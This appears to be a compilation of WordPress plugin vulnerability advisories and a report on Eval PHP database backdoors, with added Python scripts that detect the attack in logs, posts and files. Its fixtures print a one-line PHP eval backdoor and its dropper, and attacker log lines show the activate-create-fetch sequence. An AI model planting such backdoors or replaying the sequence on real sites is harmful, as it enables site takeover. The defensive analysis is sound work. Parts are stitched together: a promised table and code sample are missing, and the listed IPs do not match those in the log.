“Never Assume Anything” – that is the 4th Guiding Principle written in the Security section of the WordPress Common APIs Handbook for developers. When it comes to WordPress plugin security, assumptions can be dangerous. This became evident when the Wordfence Threat Intelligence team discovered an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in 14 different email logging plugins. The common thread? An assumption that the contents of emails generated within a WordPress instance could not be influenced by external actors. This oversight potentially exposed over 600,000 users to significant security risks.
We contacted all affected vendors after the initial discoveries, which were made between June 4, 2023 and June 11, 2023. Some developers were responsive and others were not; nevertheless, every plugin except one has received an update addressing these vulnerabilities.
All Wordfence users are protected against any exploits targeting these vulnerabilities by the Wordfence firewall’s built-in Cross-Site Scripting protection.
Below is a table detailing the affected plugins, along with their respective slugs, CVEs, links, reported dates, disclosed dates, and fixed versions.
The Wordfence Threat Intelligence team has been monitoring an ongoing exploit campaign targeting a recently disclosed vulnerability in WooCommerce Payments, a plugin installed on over 600,000 sites. Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on July 16, 2023.
All Wordfence users, including Wordfence free users, have been protected against this vulnerability since April 22, 2023 via a Firewall rule we developed to block exploit attempts. Wordfence Premium, Care, and Response sites received protection even earlier, on March 23, 2023. Versions 4.8.0 – 5.6.1 of the WooCommerce Payments plugin are vulnerable.
Readers can continue watching this and other trends on the Wordfence Intelligence dashboard, where it is currently the most heavily-attacked unique WordPress vulnerability.
Unlike many other large-scale campaigns, which typically attack millions of sites indiscriminately, this one appears to be targeted at a smaller set of websites. What is particularly interesting is that we saw early warning signs several days before the main wave of attacks: an increase in plugin enumeration requests probing for a readme.txt file in the wp-content/plugins/woocommerce-payments/ directory of millions of sites. A 200 response to that probe tells the attacker the plugin is installed, and the readme's Stable tag line gives away the installed version, so the actual exploit wave could be aimed only at sites known to be running a vulnerable version.
On June 19, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Arbitrary File Upload vulnerability in WPEverest’s User Registration plugin, which is actively installed on more than 60,000 WordPress websites. This vulnerability makes it possible for an authenticated attacker with minimal permissions, such as a subscriber, to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
All users of Wordfence received a firewall rule to protect against any exploits targeting this vulnerability by July 20, 2023.
We contacted WPEverest on June 19, 2023, and received a response the same day. After we provided full disclosure details, the developer released a first patch in version 3.0.2 on June 29, 2023, which did not fully address the vulnerability. A fully patched point release followed on July 4, 2023. We would like to commend the WPEverest development team for their prompt response and timely patch.
We urge users to update their sites to the latest patched version of User Registration as soon as possible; note that version 3.0.2 alone is not a complete fix.
On June 5, 2023, the Wordfence Threat Intelligence team identified, and began the responsible disclosure process for, an Arbitrary User Password Change vulnerability in the LearnDash LMS plugin, a WordPress plugin that is actively installed on more than 100,000 WordPress websites according to our estimates. This vulnerability makes it possible for any user with an existing account to reset arbitrary user passwords, including those of accounts with administrative-level access.
Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on June 5, 2023. Sites still using the free version of Wordfence received the same protection on July 5, 2023.
Wordfence contacted the LearnDash team on June 5, 2023, and received a response the same day. After providing full disclosure details, the developer released a patch on June 6, 2023. We would like to commend the LearnDash support and development team for their prompt response and timely patch, which was released in just one day.
We urge users to update their sites to the latest patched version of LearnDash LMS as soon as possible, as this vulnerability has a critical impact.
On June 29, 2023, the Wordfence Threat Intelligence Team became aware of an unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. We spotted it through the vulnerability changelog monitoring we do to keep the Wordfence Intelligence Vulnerability Database up to date and accurate. Upon further investigation, we confirmed that the vulnerability is being actively exploited and that it has not been adequately patched in the latest available version, which is 2.6.6 at the time of this writing.
Once we determined the root cause, we released a firewall rule to help protect our Wordfence Premium customers. Wordfence free users will receive the same protection in 30 days, on July 29, 2023. As the latest version of the plugin, 2.6.6, is not fully patched, we recommend uninstalling the plugin until a complete patch has been released.
On May 28, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in miniOrange’s WordPress Social Login and Register plugin, which is actively installed on more than 30,000 WordPress websites. The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address.
Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on June 2, 2023. Sites still using the free version of Wordfence received the same protection on July 2, 2023.
Wordfence contacted miniOrange on May 30, 2023, and received a response on June 2, 2023. After we provided full disclosure details, the developer released a first patch in version 7.6.4 on June 12, 2023, which still contained a vulnerability. A fully patched version, 7.6.5, was released on June 14, 2023.
We urge users to ensure their sites have been updated with the latest patched version of WordPress Social Login and Register, which is version 7.6.5 at the time of this writing, as soon as possible.
On May 22, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in StylemixThemes’s BookIt plugin, which is actively installed on more than 10,000 WordPress websites. The vulnerability makes it possible for an attacker to gain access to any account on the site, including the administrator account, if the attacker knows their email address.
Sites still using the free version of Wordfence will receive a firewall rule to protect against any exploits targeting this vulnerability on June 21, 2023. Wordfence Premium users have been protected since May 23, 2023.
Wordfence contacted StylemixThemes on May 22, 2023, and received a response the next day. After we provided full disclosure details, the developer released a first patch on May 31, 2023, which still contained a vulnerability, and then released a fully patched version on June 13, 2023. We would like to commend the StylemixThemes development team for their prompt response and timely patch.
We urge users to update their sites with the latest patched version of BookIt, version 2.3.8 at the time of this writing, as soon as possible.
On May 29, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in Tyche Softwares' Abandoned Cart Lite for WooCommerce plugin, which is actively installed on more than 30,000 WordPress websites. This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts. These are typically customers, but under the right conditions the affected accounts can include higher-privileged users.
Users of paid Wordfence versions received a firewall rule to protect against any exploits targeting this vulnerability on June 7, 2023. Sites still using the free version of Wordfence will receive the same protection on July 7, 2023.
Wordfence contacted Tyche Softwares on May 30, 2023, and received a response the next day. After we provided full disclosure details, the developer released a patch on June 6, 2023. We would like to commend the Tyche Softwares development team for their prompt response and timely patch.
We urge users to update their sites with the latest patched version of Abandoned Cart Lite for WooCommerce, version 5.15.1 at the time of this writing, as soon as possible.
Attackers are always finding new and creative ways to compromise websites and maintain their foothold in environments. This is frequently done via the use of backdoors: PHP scripts designed to allow attackers access and control even after you’ve changed your passwords and thought that the worst was over.
Since external scans cannot see website backdoors, they are usually identified through server-side scans and file-integrity monitoring, which we offer as part of our services. Several of the available WordPress security plugins offer the same capabilities.
However, we recently started observing attackers making use of an unorthodox type of backdoor and reinfection method which would go completely undetected if website monitoring doesn’t happen to include the database.
Website backdoors are almost always written in PHP, the backbone of the modern web. WordPress itself (powering over 40% of the web) is largely PHP based, as are most other major CMS platforms such as Joomla and Magento. PHP is an incredibly versatile language, which also means it can be misused by attackers, and one of the most common misuses is backdoors.
According to our recent 2022 Website Threat Report, we can see that remote code execution backdoors, webshells, and uploaders are the most popular among attackers to deploy to infected environments:
This code is quite simple: it uses the file_put_contents function to write a PHP script containing the specified remote code execution backdoor into the docroot of the website. All the attacker needs to do is visit one of the infected posts or pages, and the backdoor is written into the file structure.
The backdoor itself is not new: more conventional PHP backdoors of this variety were found as early as last summer, and over 6,000 instances of this backdoor have been cleaned from compromised sites in the last 6 months alone. What is new and interesting is that the dropper is now injected into the database.
Misuse of legitimate plugin
In the code sample above you may notice the [evalphp] WordPress shortcodes (small code tags used in WordPress environments that make it easy to add complex functionality to a site). These belong to a very old WordPress plugin in the official repository with the same name, Eval PHP:
This plugin allows PHP code to be inserted into pages and posts of WordPress sites and then executed every time the posts are opened in a browser. What could go wrong, right?
It hasn’t been updated in over a decade and has very few genuine active installations. However, since the beginning of April it has surged in popularity:
For the ten years leading up to the end of March 2023, this plugin rarely saw even one download a day. But around March 29, 2023, daily downloads spiked to 7,000, and every day since then we have seen 3,000 to 5,000 downloads, over 100,000 in total.
This WordPress.org download data correlates with our own logs, where we see that, starting March 29, 2023, attackers began installing the Eval PHP plugin on compromised sites and using it to create the backdoors described above.
In all cases the requests originate from these three IP addresses:
18.104.22.168 – AEZA-AS, RU
22.214.171.124 – AEZA-AS, RU
126.96.36.199 – AEZA-AS, RU
188.8.131.52 - - [08/Apr/2023:07:28:21 -0700] "PUT /wp-json/wp/v2/plugins/evalphp/evalphp/?status=active HTTP/1.1" 200 635 "http://<redacted>.com/wp-json/wp/v2/plugins" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 613
184.108.40.206 - - [08/Apr/2023:07:28:30 -0700] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 2029 "http://<redacted>.com/wp-json/wp/v2/plugins/evalphp/evalphp/?status=active" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 504
220.127.116.11 - - [08/Apr/2023:07:28:31 -0700] "GET /3e9c0ca6bbe9.php HTTP/1.1" 200 27 "http://<redacted>.com/wp-json/wp/v2/pages" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 17
Here you can see a sequence of requests that:
Activates the Eval PHP plugin (or confirms that it is already active) through the WordPress REST API plugins endpoint.
Creates a page with malware inside the [evalphp] shortcodes. It is enough to execute the PHP code and drop the 3e9c0ca6bbe9.php backdoor (the filename is unique for each environment) in the site root.
Accesses the newly dropped backdoor.
Since the backdoor reads the PHP code it executes from $_REQUEST[id], it does not need a POST request to keep its parameters out of the access logs: where $_REQUEST is populated from cookies as well as from the query string and the POST body, the payload can be passed as a cookie on a plain GET. Whether cookies land in $_REQUEST depends on PHP configuration: the built-in default (variables_order = "EGPCS" with request_order unset) includes them, while the stock php.ini-production sets request_order = "GP", which excludes them.
GET requests without visible parameters look less suspicious than POST requests, but in the case of this backdoor a bare GET can be just as dangerous, and a log-based detection should not rely on seeing a query string.
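The two log patterns described on this page (the readme.txt enumeration probes that preceded the WooCommerce Payments attack wave, and the activate-plugin / create-page / fetch-backdoor sequence from the Eval PHP campaign) can both be picked out of an ordinary combined-format access log. The script below is an added example written for this page, not code from Wordfence, Sucuri or WordPress. The log lines it runs on are constructed (RFC 5737 documentation addresses, the same request lines as the excerpt above), and the list of WordPress core files allowed in the docroot and the "unknown root-level .php" rule are assumptions to tune for your own install.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

README_PROBE = re.compile(r'^/wp-content/plugins/woocommerce-payments/readme\.txt$')
EVALPHP_ACTIVATE = re.compile(r'^/wp-json/wp/v2/plugins/evalphp/evalphp/?\?status=active')
REST_CREATE = re.compile(r'^/wp-json/wp/v2/(?:pages|posts)/?$')
ROOT_PHP = re.compile(r'^/([^/?]+\.php)(?:\?.*)?$')
# Assumption: a stock WordPress install; any other .php directly in the docroot is suspect.
WP_CORE_ROOT = {
    'index.php', 'wp-login.php', 'wp-cron.php', 'xmlrpc.php', 'wp-comments-post.php',
    'wp-signup.php', 'wp-activate.php', 'wp-trackback.php', 'wp-links-opml.php',
    'wp-mail.php', 'wp-load.php', 'wp-blog-header.php', 'wp-settings.php', 'wp-config.php',
}


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_unknown_root_php(path):
    """True for a request to a .php file in the docroot that is not a WordPress core file."""
    m = ROOT_PHP.match(path)
    return bool(m) and m.group(1) not in WP_CORE_ROOT


def analyze(lines):
    """Flag readme.txt enumeration probes and completed Eval PHP dropper sequences per IP."""
    readme_probes = []
    sequences = []
    state = defaultdict(dict)  # per-IP progress through activate -> create -> fetch
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec['ip'], rec['method'], rec['path'], rec['status']
        if README_PROBE.match(path):
            readme_probes.append((ip, rec['ts']))  # recorded whatever the status: a 404 is still a probe
        st = state[ip]
        if method in ('PUT', 'POST') and status == '200' and EVALPHP_ACTIVATE.match(path):
            st.clear()
            st['activated_at'] = rec['ts']
        elif 'activated_at' in st and method == 'POST' and status == '201' and REST_CREATE.match(path):
            st['created_at'] = rec['ts']
        elif 'created_at' in st and method == 'GET' and status == '200' and is_unknown_root_php(path):
            # A bare GET is enough: the dropped backdoor reads its payload from $_REQUEST,
            # so the parameters may travel as cookies and never appear in the request line.
            sequences.append({'ip': ip, 'activated_at': st['activated_at'],
                              'created_at': st['created_at'], 'backdoor_path': path})
            st.clear()
    return {'readme_probes': readme_probes, 'evalphp_sequences': sequences}


# Constructed sample log: one enumeration probe, one benign readme fetch, one full dropper sequence.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jul/2023:10:01:02 -0700] "GET /wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jul/2023:10:01:05 -0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
192.0.2.10 - - [08/Apr/2023:07:28:21 -0700] "PUT /wp-json/wp/v2/plugins/evalphp/evalphp/?status=active HTTP/1.1" 200 635 "-" "Mozilla/5.0"
192.0.2.10 - - [08/Apr/2023:07:28:30 -0700] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 2029 "-" "Mozilla/5.0"
192.0.2.10 - - [08/Apr/2023:07:28:31 -0700] "GET /3e9c0ca6bbe9.php HTTP/1.1" 200 27 "-" "Mozilla/5.0"
192.0.2.11 - - [08/Apr/2023:07:30:00 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    import json
    print(json.dumps(analyze(SAMPLE_LOG.splitlines()), indent=2))
```

Run it against a real log with `analyze(open('access.log'))`. The sequence matcher is deliberately strict (all three steps from one IP, in order), which keeps false positives low but will miss an attacker who rotates addresses between steps; loosening it to match on the activation request alone is reasonable on a site where nobody should be installing plugins.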
Pages with evalphp malware
In our experience, hackers sometimes create a test page (new pages are not shown on the home page by default) with the slug publish, so that its URL on a typical WordPress site is <site-domain>.com/publish/, and the word “Test” as its only content.
However, the real backdoors are created in multiple posts that are saved as drafts and not publicly visible at all. The way the Eval PHP plugin works it’s enough to save a page as a draft in order to execute the PHP code inside the [evalphp] shortcodes.
This is how these page drafts look in the SQL dump of the wp_posts table:
In all cases, attackers were able to log into WordPress admin, and the malicious pages were created with a real site administrator as their author. On some of the compromised sites, however, we also found newly created malicious admin users with random names and outlook.com emails, for example 5faf461e / 5faf461e@outlook[.]com, df8a6aa9 / df8a6aa9@outlook[.]com, and so on.
The compromised sites sometimes have the same backdoor installed in other files. Most often we find it in /wp-content/plugins/background-image-cropper/accesson.php — in logs we find how hackers upload a custom version of the legitimate background-image-cropper plugin. We also find it in the theme’s functions.php file when attackers modify this file using the WordPress theme editor.
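A scanner that only walks the filesystem misses the draft posts that carry the dropper, so a cleanup needs to look at the database too. The following is an added example written for this page, not Sucuri's or WordPress's own tooling: it checks wp_posts for [evalphp] shortcodes in every post_status (drafts included), looks for the random 8-hex-character / outlook.com admin accounts described above, and runs a few signature checks over PHP source (the accesson.php and functions.php locations mentioned above). The tables and rows are an in-memory SQLite copy with constructed content; the SQL is plain enough to run unchanged against the MySQL database of a live site. The signature regexes are heuristics of my own and will need tuning.

```python
import re
import sqlite3

EVALPHP_SHORTCODE = re.compile(r'\[evalphp\](.*?)\[/evalphp\]', re.S | re.I)
# Login pattern observed on compromised sites: 8 hex characters, mailbox name identical to the login.
HEX8_LOGIN = re.compile(r'^[0-9a-f]{8}$')
# Heuristic signatures (assumption: tune against your own samples). Code executed straight from a
# request variable, a .php file written from PHP, or eval over an obfuscated blob.
BACKDOOR_SIGS = [
    ('eval-from-request', re.compile(r'eval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[', re.I)),
    ('writes-php-file', re.compile(r'file_put_contents\s*\([^;]*\.php', re.I)),
    ('eval-of-decoded-blob', re.compile(r'eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(', re.I)),
]


def scan_php_source(source):
    """Names of the signatures that fire on a piece of PHP source."""
    return [name for name, rx in BACKDOOR_SIGS if rx.search(source)]


def find_evalphp_posts(conn):
    """Every post or page carrying an [evalphp] shortcode, regardless of post_status."""
    rows = conn.execute(
        "SELECT ID, post_status, post_author, post_name, post_content FROM wp_posts "
        "WHERE post_content LIKE '%[evalphp]%' ORDER BY ID"
    ).fetchall()
    hits = []
    for pid, status, author, slug, content in rows:
        for code in EVALPHP_SHORTCODE.findall(content):
            hits.append({'ID': pid, 'post_status': status, 'post_author': author,
                         'post_name': slug, 'code': code.strip(),
                         'signatures': scan_php_source(code)})
    return hits


def find_suspicious_users(conn):
    """Users whose login is an 8-hex string and whose e-mail is <login>@outlook.com."""
    rows = conn.execute("SELECT ID, user_login, user_email, user_registered FROM wp_users").fetchall()
    return [{'ID': i, 'user_login': l, 'user_email': e, 'user_registered': r}
            for i, l, e, r in rows
            if HEX8_LOGIN.match(l) and e.lower() == f'{l}@outlook.com']


def scan_files(files):
    """Map path -> signature names for every file whose source trips at least one signature."""
    hits = {path: scan_php_source(src) for path, src in files.items()}
    return {path: sigs for path, sigs in hits.items() if sigs}


def build_sample_db():
    """Constructed wp_posts / wp_users fixtures mirroring what the post describes."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_author INTEGER, post_status TEXT,
                               post_type TEXT, post_name TEXT, post_content TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                               user_registered TEXT);
    """)
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?,?,?)", [
        (1, 1, 'publish', 'page', 'about', '<p>About us</p>'),
        (2, 1, 'publish', 'page', 'publish', 'Test'),  # the attacker's "Test" probe page
        (3, 1, 'draft', 'post', 'untitled',             # draft: never public, still executed on save
         "[evalphp] file_put_contents(ABSPATH . 'dropped.php', '<?php eval($_REQUEST[id]); ?>'); [/evalphp]"),
        (4, 2, 'draft', 'post', 'notes', 'Draft notes, nothing to see here'),
    ])
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", [
        (1, 'editor', 'editor@example.com', '2021-03-01 09:00:00'),
        (2, '5faf461e', '5faf461e@outlook.com', '2023-04-08 07:27:55'),
    ])
    return conn


# Constructed file contents for the two on-disk locations mentioned above.
SAMPLE_FILES = {
    'wp-content/plugins/background-image-cropper/accesson.php': '<?php @eval($_REQUEST["id"]);',
    'wp-content/themes/twentytwentythree/functions.php':
        "<?php\nadd_action('wp_enqueue_scripts', 'theme_assets');",
}

if __name__ == '__main__':
    db = build_sample_db()
    print('evalphp posts:', find_evalphp_posts(db))
    print('suspicious users:', find_suspicious_users(db))
    print('file hits:', scan_files(SAMPLE_FILES))
```

The LIKE filter does the cheap pre-selection in the database; the regex then extracts each shortcode body so the code can be reviewed and signature-checked. Removing the flagged posts is not sufficient on its own: the dropper has already written its file, so every hit here should be paired with a filesystem search for recently modified or unknown .php files.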
Why are attackers putting backdoors into wp_posts?
You might be wondering why the attackers would choose this new tactic of injecting backdoors into compromised website environments rather than just sticking with good old fashioned PHP backdoors.
Although the injection in question does drop a conventional backdoor into the file structure, the combination of a legitimate plugin and a backdoor dropper in a WordPress post allows them to easily reinfect the website and stay hidden — all they need to do is to visit a “benign” web page.
Fortunately, some WordPress security plugins, such as our Sucuri Scanner, do log administrator activity within a website, such as plugin installations and changes to pages and posts, which are symptoms of this attack. If you notice the Eval PHP plugin installed on your website and you did not install it, there is a good chance that your website has been compromised.
Potentially dangerous plugins in WordPress repository
At this point, WordPress shows a warning when you open the Eval PHP page in the official plugin repository:
This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.
However, this may not be enough for plugins that can be easily abused. Maybe such plugins should be completely delisted, especially when they are not updated for 10+ years and have a really small legitimate user base.
The Eval PHP plugin has not been updated for 11+ years and has only 40+ active installations. Is there a reason to keep it in the repository after so many years of inactivity? And, as noted above, we can see increased interest in this plugin during the last week.
Keeping such plugins in the official repository makes it easier for hackers to stay under the radar: they can install a legitimate, unmodified plugin from a reputable source instead of installing fake plugins or modifying existing ones, which scanners that monitor the integrity of known plugins can detect.
Mitigation steps to protect your environment
In the logs of every environment affected by these backdoors that we have checked so far, the attackers already had administrator access to the website, which is what allowed them to install the Eval PHP plugin.
This is a testament to how crucially important it is to secure the wp-admin panel of your WordPress environment as well as monitor any administrator activity taking place. In addition to regular file cleanup and changing passwords, don’t forget to review your WordPress users and pages — some of them may have been created by hackers.
Other steps to mitigate risk from infection include:
Keep your website patched and up to date with the latest security releases
On April 3, 2023, the Wordfence team uncovered two significant vulnerabilities in Directorist: an Arbitrary User Password Reset leading to Privilege Escalation, and an Insecure Direct Object Reference leading to Arbitrary Post Deletion. Both vulnerabilities affect Directorist versions 7.5.4 and earlier.
Sites using the free version of Wordfence received a firewall rule to protect against any exploits targeting these vulnerabilities on May 4, 2023.
Unfortunately, on June 1, 2023, the plugin was closed due to developer unresponsiveness, and it currently remains unavailable for download from the repository. This presents an issue as site owners are unable to request an update directly via their WordPress dashboard. Given this situation, we advise site owners to either temporarily uninstall the plugin, or manually download the patched version, 7.5.5, directly from the developer’s site and upload it to their sites for optimal protection. For this reason, we have intentionally kept specific vulnerability details to a minimum in this post.